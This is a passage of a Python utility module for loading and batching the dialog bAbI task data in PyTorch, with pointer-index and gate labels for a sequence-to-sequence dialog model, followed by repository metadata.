trg_seq, index_seq, gate_seq,src_word2id, trg_word2id,max_len):\n \"\"\"Reads source and target sequences from txt files.\"\"\"\n self.src_seqs = 
src_seq\n self.trg_seqs = trg_seq\n self.index_seqs = index_seq \n self.gate_seq = gate_seq \n self.num_total_seqs = len(self.src_seqs)\n self.src_word2id = src_word2id\n self.trg_word2id = trg_word2id\n self.max_len = max_len\n\n def __getitem__(self, index):\n \"\"\"Returns one data pair (source and target).\"\"\"\n src_seq = self.src_seqs[index]\n trg_seq = self.trg_seqs[index]\n index_s = self.index_seqs[index]\n gete_s = self.gate_seq[index]\n src_seq = self.preprocess(src_seq, self.src_word2id, trg=False)\n trg_seq = self.preprocess(trg_seq, self.trg_word2id)\n index_s = self.preprocess_inde(index_s,src_seq)\n gete_s = self.preprocess_gate(gete_s)\n \n return src_seq, trg_seq, index_s, gete_s,self.max_len,self.src_seqs[index],self.trg_seqs[index]\n\n def __len__(self):\n return self.num_total_seqs\n \n def preprocess(self, sequence, word2id, trg=True):\n \"\"\"Converts words to ids.\"\"\"\n if(trg):\n sequence = [word2id[word] if word in word2id else UNK_token for word in sequence.split(' ')]+ [EOS_token]\n sequence = torch.Tensor(sequence)\n else:\n sequence = [word2id[word] if word in word2id else UNK_token for word in sequence.split(' ')]\n sequence = torch.Tensor(sequence)\n return sequence\n\n def preprocess_inde(self, sequence,src_seq):\n \"\"\"Converts words to ids.\"\"\"\n sequence = sequence + [len(src_seq)-1]\n sequence = torch.Tensor(sequence)\n return sequence\n\n def preprocess_gate(self, sequence):\n \"\"\"Converts words to ids.\"\"\"\n sequence = sequence + [0]\n sequence = torch.Tensor(sequence)\n return sequence\n\ndef collate_fn(data):\n def merge(sequences,max_len):\n lengths = [len(seq) for seq in sequences]\n if (max_len):\n padded_seqs = torch.ones(len(sequences), max_len[0]).long()\n else:\n padded_seqs = torch.ones(len(sequences), max(lengths)).long()\n for i, seq in enumerate(sequences):\n end = lengths[i]\n padded_seqs[i, :end] = seq[:end]\n return padded_seqs, lengths\n\n # sort a list by sequence length (descending order) to use pack_padded_sequence\n data.sort(key=lambda x: len(x[0]), reverse=True)\n # seperate source and target sequences\n src_seqs, trg_seqs, ind_seqs, gete_s, max_len, src_plain,trg_plain = zip(*data)\n # merge sequences (from tuple of 1D tensor to 2D tensor)\n src_seqs, src_lengths = merge(src_seqs,max_len)\n trg_seqs, trg_lengths = merge(trg_seqs,None)\n ind_seqs, _ = merge(ind_seqs,None)\n gete_s, _ = merge(gete_s,None)\n \n src_seqs = Variable(src_seqs).transpose(0,1)\n trg_seqs = Variable(trg_seqs).transpose(0,1)\n ind_seqs = Variable(ind_seqs).transpose(0,1)\n gete_s = Variable(gete_s).transpose(0,1)\n if USE_CUDA:\n src_seqs = src_seqs.cuda()\n trg_seqs = trg_seqs.cuda()\n ind_seqs = ind_seqs.cuda()\n gete_s = gete_s.cuda()\n return src_seqs, src_lengths, trg_seqs, trg_lengths, ind_seqs, gete_s, src_plain, trg_plain\n\n\ndef read_langs(file_name, max_line = None):\n logging.info((\"Reading lines from {}\".format(file_name)))\n # Read the file and split into lines\n data=[]\n context=\"\"\n u=None\n r=None\n with open(file_name) as fin:\n cnt_ptr = 0\n cnt_voc = 0\n max_r_len = 0\n cnt_lin = 1\n for line in fin:\n line=line.strip()\n if line:\n nid, line = line.split(' ', 1)\n if '\\t' in line:\n u, r = line.split('\\t')\n context += str(u)+\" \" \n contex_arr = context.split(' ')[LIMIT:]\n r_index = []\n gate = []\n for key in r.split(' '):\n index = [loc for loc, val in enumerate(contex_arr) if val == key]\n if (index):\n index = max(index)\n gate.append(1)\n cnt_ptr +=1\n else: \n index = len(contex_arr) - 1 \n gate.append(0) \n 
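The merge helper inside collate_fn above pads variable-length sequences into a [batch, max_len] LongTensor; it pads with 1 because it starts from torch.ones (whether that equals PAD_token depends on utils.config). A self-contained equivalent (function name hypothetical):

import torch

def pad_batch(seqs, pad_value=1):
    """Right-pad integer sequences to the batch maximum, returning lengths too."""
    lengths = [len(s) for s in seqs]
    out = torch.full((len(seqs), max(lengths)), pad_value, dtype=torch.long)
    for i, s in enumerate(seqs):
        out[i, : lengths[i]] = torch.as_tensor(s, dtype=torch.long)
    return out, lengths

batch, lengths = pad_batch([[5, 6, 7], [8, 9]])
assert batch.tolist() == [[5, 6, 7], [8, 9, 1]] and lengths == [3, 2]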
cnt_voc +=1 \n r_index.append(index)\n\n if len(r_index) > max_r_len: \n max_r_len = len(r_index)\n data.append([\" \".join(contex_arr)+\"$$$$\",r,r_index,gate])\n context+=str(r)+\" \" \n else:\n r=line\n if USEKB:\n context+=str(r)+\" \" \n else:\n cnt_lin+=1\n if(max_line and cnt_lin>=max_line):\n break\n context=\"\"\n max_len = max([len(d[0].split(' ')) for d in data])\n avg_len = sum([len(d[0].split(' ')) for d in data]) / float(len([len(d[0].split(' ')) for d in data]))\n logging.info(\"Pointer percentace= {} \".format(cnt_ptr/(cnt_ptr+cnt_voc)))\n logging.info(\"Max responce Len: {}\".format(max_r_len))\n logging.info(\"Max Input Len: {}\".format(max_len))\n logging.info(\"AVG Input Len: {}\".format(avg_len))\n return data, max_len, max_r_len\n\n\ndef get_seq(pairs,lang,batch_size,type,max_len): \n x_seq = []\n y_seq = []\n ptr_seq = []\n gate_seq = []\n for pair in pairs:\n x_seq.append(pair[0])\n y_seq.append(pair[1])\n ptr_seq.append(pair[2])\n gate_seq.append(pair[3])\n if(type):\n lang.index_words(pair[0])\n lang.index_words(pair[1])\n \n dataset = Dataset(x_seq, y_seq,ptr_seq,gate_seq,lang.word2index, lang.word2index,max_len)\n data_loader = torch.utils.data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=type,\n collate_fn=collate_fn)\n return data_loader\n\ndef prepare_data_seq(task,batch_size=100,shuffle=True):\n file_train = 'data/dialog-bAbI-tasks/dialog-babi-task{}trn.txt'.format(task)\n file_dev = 'data/dialog-bAbI-tasks/dialog-babi-task{}dev.txt'.format(task)\n file_test = 'data/dialog-bAbI-tasks/dialog-babi-task{}tst.txt'.format(task)\n if (int(task) != 6):\n file_test_OOV = 'data/dialog-bAbI-tasks/dialog-babi-task{}tst-OOV.txt'.format(task)\n pair_train,max_len_train, max_r_train = read_langs(file_train, max_line=None)\n pair_dev,max_len_dev, max_r_dev = read_langs(file_dev, max_line=None)\n pair_test,max_len_test, max_r_test = read_langs(file_test, max_line=None)\n max_r_test_OOV = 0\n max_len_test_OOV = 0\n if (int(task) != 6):\n pair_test_OOV,max_len_test_OOV, max_r_test_OOV = read_langs(file_test_OOV, max_line=None)\n \n max_len = max(max_len_train,max_len_dev,max_len_test,max_len_test_OOV) +1\n max_r = max(max_r_train,max_r_dev,max_r_test,max_r_test_OOV) +1\n lang = Lang()\n \n train = get_seq(pair_train,lang,batch_size,True,max_len)\n dev = get_seq(pair_dev,lang,batch_size,False,max_len)\n test = get_seq(pair_test,lang,batch_size,False,max_len)\n if (int(task) != 6):\n testOOV = get_seq(pair_test_OOV,lang,batch_size,False,max_len)\n else:\n testOOV = []\n \n \n logging.info(\"Read %s sentence pairs train\" % len(pair_train))\n logging.info(\"Read %s sentence pairs dev\" % len(pair_dev))\n logging.info(\"Read %s sentence pairs test\" % len(pair_test))\n if (int(task) != 6):\n logging.info(\"Read %s sentence pairs test\" % len(pair_test_OOV)) \n logging.info(\"Max len Input %s \" % max_len)\n logging.info(\"Vocab_size %s \" % lang.n_words)\n logging.info(\"USE_CUDA={}\".format(USE_CUDA))\n \n return train, dev, test, testOOV, lang, max_len, max_r\n\n","sub_path":"utils/utils_babi.py","file_name":"utils_babi.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
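read_langs above turns each response token into a pointer target: the last position where the token occurs in the dialog context (gate 1), or the final sentinel position (gate 0) when it is absent; cnt_ptr and cnt_voc count those two cases. The same construction in isolation:

def pointer_targets(context_tokens, response_tokens):
    """Return (indices, gates): index of each response token in the context,
    falling back to the last (sentinel) slot with gate 0 when not found."""
    indices, gates = [], []
    for tok in response_tokens:
        hits = [i for i, w in enumerate(context_tokens) if w == tok]
        if hits:
            indices.append(max(hits))              # last occurrence wins
            gates.append(1)
        else:
            indices.append(len(context_tokens) - 1)  # sentinel: final slot
            gates.append(0)
    return indices, gates

ctx = "hi i would like some italian food $$$$".split()
idx, gate = pointer_targets(ctx, "which price range ?".split())
assert gate == [0, 0, 0, 0] and idx == [7, 7, 7, 7]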